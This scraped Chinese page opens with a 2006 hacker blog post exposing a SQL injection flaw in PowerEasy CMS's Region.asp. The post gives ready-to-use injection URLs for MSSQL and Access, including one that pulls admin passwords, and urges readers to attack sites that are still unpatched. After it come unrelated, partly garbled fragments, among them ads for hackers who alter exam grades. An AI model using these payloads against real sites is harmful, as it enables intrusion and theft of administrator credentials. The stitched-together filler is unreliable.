每日好文
哇哈哈,昨天看到动易出补丁了,甚是郁闷,俺拿到这个0day都还没开始玩,就这样被洗白鸟,郁闷啊,早知道不玩动易主站,而且是get提交方式,当初如果听CN的话,也许这个0day还会一直埋在地下,刚看了下动易的补丁,这次补的地方不至这一个,哈哈,传说的7个以上的bug,不知道还省几个呢?下面是大概一个月前写的东西,发出来给大家搞一些懒惰的管理员,补丁都发2天了,还没补的话,就是管理员的错了哦,呵呵~~~38也还没补哦,要上的就快上,哈哈~~~ 文章标题:动易最新未公开Bug文章作者:WhyTt漏洞发现时间:2006年10月22日个人Blog:http://why_tt.mblogger.cn //个人个人Blog:http://whytt.mblogger.cn //技术影响版本:ACCESS和MSSQL 今天下午看了一个下午的动网代码,头甚是疼,于是晚上回来,找找动易还有其他漏洞没,结果一看,还真有一处,逻辑错误!在Region.asp中 Country = ReplaceBadChar(Trim(Request("Country")))Province = ReplaceBadChar(Trim(Request("Province")))City = ReplaceBadChar(Trim(Request("City"))) 对所有传入的变量都进行了过滤,但是编程者在这里: Set TempRs = Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")If Err Or TempRs.EOF Then ReDim ShowProvince(0, 0) Province = Trim(Request.QueryString("Province"))Else ShowProvince = TempRs.GetRows(-1)End IfSet TempRs = Conn.Execute("SELECT DISTINCT City FROM PE_City WHERE Province='" & Province & "'") 大家可以看到,Province = Trim(Request.QueryString("Province")) 这里直接取的是传入的Province,而不是过滤后的,所以这个Province变量危险了,那么在下面他是直接带入了查询,由于Province变量是我们可以随意构造的,所以我们就可以构造我们的SQL语句。 但是要进入这个查询的前提是:Err=true 或者 TempRs.EOF,而要达到这2个中的一个,就是要让Conn.Execute("SELECT Province FROM PE_Province WHERE Country='" & Country & "' ORDER BY ProvinceID")这条语句在表中查询不到所要找的Country,这样就好构造了。下面是利用代码: 0">http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'+and+user>0-- 就是在 http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'后面加上我们的SQL注入语句。 这就是整个利用原理,很简单,但也很致命的漏洞。 上面是MSSQL版本的利用,而如果要是ACCESS版本中的利用,那么怎么办呢,呵呵,聪明的你可能觉得我在说废话老,看吧。 http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi' and 1=1 and '1'='1 这样的话,我们的and 1=1就是在access版本中的利用。呵呵。这样就完成这个漏洞在2个版本的利用。 http://127.0.0.1/Region.asp?Country=tt&City=whytt&Province=shi'+and+1=2+union+select+password+from+PE_Admin+where+1
不能说的xs
* @throws HttpException图1流量剖析ForEach($file in (Get-ChildItem -recurse -Filter "*.dll" -Path 'C:windo...
设计的世界里,瞬息万变,大概本日会出一个设计要领,来日诰日大概会再出一个设计要领去推翻本日的要领,假如你的想法永远逗留在昨天,那么你只是在设计着过期的【设计】。 设计的路上,我们都在尽力成为一名优秀...
会考改成绩找专业黑客相关问题 黑客怎么破解别人wf相关问题 gta5名钻赌场豪劫黑客怎么解锁 海外抖音高级设置(wish海外仓怎么设置)...
秋天上火怎么办(秋季天气干燥易上火该怎么办)在秋高气爽的秋天反而是容易使人上火的,很多朋友最近都各种上火了,小编我也中招了!那秋天上火应该怎么解决呢?上火应该怎么办呢?下面我们一起来看看降火的小窍门吧...
中新网11月28日电 综合报道,英国与欧盟就英国脱欧后贸易协议的谈判期限逼近,但若干重要议题的协商仍陷于僵局。不过,当地时间27日,英国首席谈判代表佛罗斯特表示,协议仍有可能达成。 当地时...
可是,儿子早恋这些不能只看一阵儿,随后又扇了他一个耳光,他对林芳兵也很照护。小学生早恋处理惩罚并且,中学早恋他们的人缘太好了,对孩子人格的早恋否认会伤害到孩子的自信心和自尊心。在自然少不了可以听音乐的...